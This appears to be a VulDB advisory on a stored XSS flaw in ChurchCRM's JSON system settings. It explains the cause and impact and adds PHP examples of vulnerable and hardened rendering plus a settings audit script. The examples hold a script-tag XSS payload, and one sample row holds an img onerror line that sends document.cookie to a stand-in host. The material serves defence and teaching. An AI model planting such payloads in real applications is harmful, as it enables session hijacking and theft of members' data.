CVE-2026-32880 in ChurchCRM

Summary

by MITRE • 03/20/2026

ChurchCRM is an open-source church management system. Versions prior to 7.0.2 allow an admin user to edit JSON type system settings to store a JavaScript payload that can execute when any admin views the system settings. The JSON input is left unescaped/unsanitized in SystemSettings.php, leading to XSS. This issue has been fixed in version 7.0.2.


Analysis

by VulDB Data Team • 03/25/2026

CVE-2026-32880 affects ChurchCRM, an open-source church management system used by religious organizations for administrative tasks including member management, financial tracking, and event coordination. A deployment holds personal and financial data about members, so the integrity of its administrative interface matters. The flaw, present in versions prior to 7.0.2, is a stored cross-site scripting issue: it requires an existing admin account to plant, but once planted it runs in the browser of every admin who opens the system settings page.

The root cause is in SystemSettings.php. When an administrator saves a system setting whose type is JSON, the application accepts the submitted JSON without validating or escaping it, and later renders the stored value back into the settings page without escaping it either. A JSON string value can therefore carry HTML and JavaScript, and because the value is persisted, the payload executes each time any admin user views the system settings page, not only on the request that submitted it.
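The following PHP script is an added example and is not ChurchCRM's code; it models the pattern the advisory describes (a JSON-typed setting echoed into the page unescaped) beside a hardened version. The function names, the setting name and the sample value are assumptions constructed for the example.

```php
<?php
// Added example, not ChurchCRM's own code. It models the failure mode the
// advisory describes: a JSON-typed system setting rendered into the settings
// page without escaping. Function names, the setting name and the sample
// value are assumptions.

declare(strict_types=1);

// Constructed sample value as a malicious admin might store it. The string is
// valid JSON; the payload lives inside one of its string values.
const SAMPLE_VALUE = '{"label":"</textarea><script>alert(document.cookie)</script>"}';

// Vulnerable pattern: the stored value is concatenated straight into the HTML,
// so the "</textarea>" inside the JSON closes the element and the script runs.
function renderSettingVulnerable(string $name, string $value): string
{
    return '<textarea name="' . $name . '">' . $value . '</textarea>';
}

// Hardened pattern: require that the value parses as JSON, re-serialise it so
// the stored form is canonical, then HTML-escape it for the textarea context.
function renderSettingHardened(string $name, string $value): string
{
    $decoded = json_decode($value, true, 512, JSON_THROW_ON_ERROR);
    $canonical = json_encode($decoded, JSON_THROW_ON_ERROR);
    $flags = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;
    return '<textarea name="' . htmlspecialchars($name, $flags, 'UTF-8') . '">'
        . htmlspecialchars($canonical, $flags, 'UTF-8')
        . '</textarea>';
}

// If the value must also be embedded in an inline <script> (for example to
// pre-populate a JSON editor), that is a different context: encode for JS with
// the JSON_HEX_* flags so "<", ">", "&" and quotes become \uXXXX escapes.
function embedSettingInScript(string $value): string
{
    $decoded = json_decode($value, true, 512, JSON_THROW_ON_ERROR);
    $js = json_encode(
        $decoded,
        JSON_THROW_ON_ERROR | JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    return '<script>var setting = ' . $js . ';</script>';
}

// Marker check: does the rendered HTML contain the payload as a live tag?
function containsLiveScriptTag(string $html): bool
{
    return stripos($html, '<script>alert') !== false;
}

$vuln   = renderSettingVulnerable('sExampleSetting', SAMPLE_VALUE);
$safe   = renderSettingHardened('sExampleSetting', SAMPLE_VALUE);
$script = embedSettingInScript(SAMPLE_VALUE);

echo 'vulnerable: ' . (containsLiveScriptTag($vuln) ? 'payload executes' : 'clean') . PHP_EOL;
echo 'hardened:   ' . (containsLiveScriptTag($safe) ? 'payload executes' : 'clean') . PHP_EOL;
echo 'script ctx: ' . (containsLiveScriptTag($script) ? 'payload executes' : 'clean') . PHP_EOL;
```

Run it with `php example.php`; only the vulnerable render reports that the payload executes. The two escaping functions are deliberately separate because the HTML-attribute/element context and the inline-script context need different encoders, and applying one where the other belongs is a common way such a fix gets reintroduced later.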

This vulnerability is classified as CWE-79 (improper neutralization of input during web page generation). Because the payload is persisted in the settings store and served to later viewers, it is a stored XSS rather than a reflected one. The attack vector is notable because it turns one admin account into a way to run code in other admin sessions: an admin whose account has been compromised, or a malicious insider, can plant a payload that every other administrator triggers simply by opening the settings page. The vulnerability maps to ATT&CK technique T1059.007 (Command and Scripting Interpreter: JavaScript).

The operational impact goes beyond running script in a browser. Code executing in another admin's session can hijack that session and take any action the victim admin could take through the application, such as modifying system configuration or exfiltrating member data. Since the attacker must already hold an admin account, the exposure is admin-to-admin persistence and lateral movement rather than initial privilege escalation; it matters most where a single admin account has been phished or where administrative duties are shared among several people. Any installation on an affected version is exposed in the same way.

Organizations running affected versions should upgrade to ChurchCRM 7.0.2 or later, which escapes JSON settings before rendering them so that a stored payload cannot execute in other admins' browsers. Because the payload is persisted, upgrading alone does not remove a value that was planted before the upgrade; administrators should also review the existing JSON-typed system settings for HTML or script content, monitor changes to system settings, and keep the number of admin accounts small. Multi-factor authentication for administrative accounts reduces the chance that an attacker obtains the admin access needed to plant the payload in the first place.
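As an added example of the post-upgrade review suggested above (not part of ChurchCRM or the advisory), the following PHP script audits a set of JSON-typed setting values for markup that should never appear inside a JSON string. The row shape (setting name to raw value), the setting names and the sample rows are constructed assumptions; a real check would read the values from the settings store.

```php
<?php
// Added example, not part of ChurchCRM or the advisory. It audits JSON-typed
// settings that may have been saved before the upgrade. The row shape, the
// setting names and the sample values are constructed assumptions.

declare(strict_types=1);

// Constructed sample rows: two benign settings, one carrying an injected
// payload inside a JSON string, and one that is not valid JSON at all.
const SAMPLE_SETTINGS = [
    'sExampleLabels'   => '{"dashboard":"Members","footer":"Contact us"}',
    'sExampleColours'  => '{"primary":"#336699","accent":"#cc0000"}',
    'sExampleTemplate' => '{"greeting":"Hello <img src=x onerror=fetch(\'//evil.example/\'+document.cookie)>"}',
    'sExampleBroken'   => '{"not":"closed"',
];

// Markup that has no business inside a JSON string value: an HTML tag,
// an inline event handler attribute, or a javascript: URL.
const SUSPICIOUS_PATTERN = '~<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript\s*:~i';

// Walk a decoded JSON value recursively; true if any string inside matches.
function jsonContainsMarkup($value): bool
{
    if (is_string($value)) {
        return preg_match(SUSPICIOUS_PATTERN, $value) === 1;
    }
    if (is_array($value)) {
        foreach ($value as $child) {
            if (jsonContainsMarkup($child)) {
                return true;
            }
        }
    }
    return false;
}

// Classify every setting as 'ok', 'suspicious' (markup inside a string value)
// or 'invalid' (the stored value does not parse as JSON, which a JSON-typed
// setting should never contain and is worth a look on its own).
function auditJsonSettings(array $settings): array
{
    $report = [];
    foreach ($settings as $name => $raw) {
        $decoded = json_decode($raw, true);
        if (json_last_error() !== JSON_ERROR_NONE) {
            $report[$name] = 'invalid';
        } elseif (jsonContainsMarkup($decoded)) {
            $report[$name] = 'suspicious';
        } else {
            $report[$name] = 'ok';
        }
    }
    return $report;
}

foreach (auditJsonSettings(SAMPLE_SETTINGS) as $name => $verdict) {
    printf("%-18s %s\n", $name, $verdict);
}
```

On the sample rows the script reports the two benign settings as ok, the template setting as suspicious and the unparseable one as invalid. The pattern is intentionally broad; a flagged value needs a human to decide whether the markup is legitimate, and anything flagged should be checked in the rendered settings page with the upgraded version rather than trusted on the basis of this scan alone.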

Responsible

GitHub M

Reservation

03/16/2026

Disclosure

03/20/2026

Moderation

accepted

CPE

ready

EPSS

0.00025

KEV

no

Activities

very low
